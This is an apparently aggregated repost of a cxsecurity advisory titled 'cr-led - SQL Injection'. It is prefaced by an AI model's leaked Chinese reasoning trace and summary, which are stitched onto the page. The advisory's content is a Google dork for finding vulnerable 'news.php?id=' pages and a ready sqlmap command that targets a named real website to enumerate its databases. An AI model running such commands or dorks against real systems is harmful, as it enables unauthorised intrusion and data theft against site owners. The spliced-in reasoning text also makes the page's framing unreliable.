cr-led - SQL Injection
嗯,用户让我总结一篇文章的内容,控制在100字以内,而且不需要特定的开头。我得先仔细阅读文章内容。看起来这篇文章是关于SQL注入漏洞的,标题是“cr-led - SQL Injection”。作者是javad rashidi,日期是2025年12月1日。 风险等级是中等,本地攻击不行,远程可以。CVE和CWE都没有编号。Dork是inurl:"news.php?id=",这可能是一个用于搜索易受攻击页面的Google Dork。 文章里还提到了使用sqlmap来测试漏洞,命令是sqlmap -u "https://www.cr-led.com/news.php?id=4" --dbs。这说明可以通过这个链接来检测数据库。 还有投票部分,50%支持,50%反对。评论部分需要填写必填字段,但有提示信息说评论会被隔离48小时。 总结的时候要包括漏洞类型、影响范围、测试方法以及相关的工具和Dork。同时要注意字数限制,确保在100字以内,并且直接描述内容,不需要额外的开头语。 </think> 文章描述了一个SQL注入漏洞存在于cr-led网站的news.php页面中,该漏洞可通过URL参数id触发,并支持远程攻击。利用sqlmap工具可进一步测试和利用该漏洞。 2025-12-1 16:54:10 Author: cxsecurity.com(查看原文) 阅读量:3 收藏

cr-led - SQL Injection

2025.12.01

Credit:

javad rashidi

Risk:

Medium

Local:

No

Remote:

Yes

CVE:

N/A

CWE:

N/A

"cr-led - SQL Injection" # Exploit Title: cr-led - SQL Injection # Date: 11-13-2025 # Exploit Author: javad rashidi # Tested on: Win,Linux # Google Dork: inurl:"news.php?id=" Sqlmap: sqlmap -u "https://www.cr-led.com/news.php?id=4" --dbs


Vote for this issue:

50%

50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.



(*) - required fields.  
{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2025120003
如有侵权请联系:admin#unsafe.sh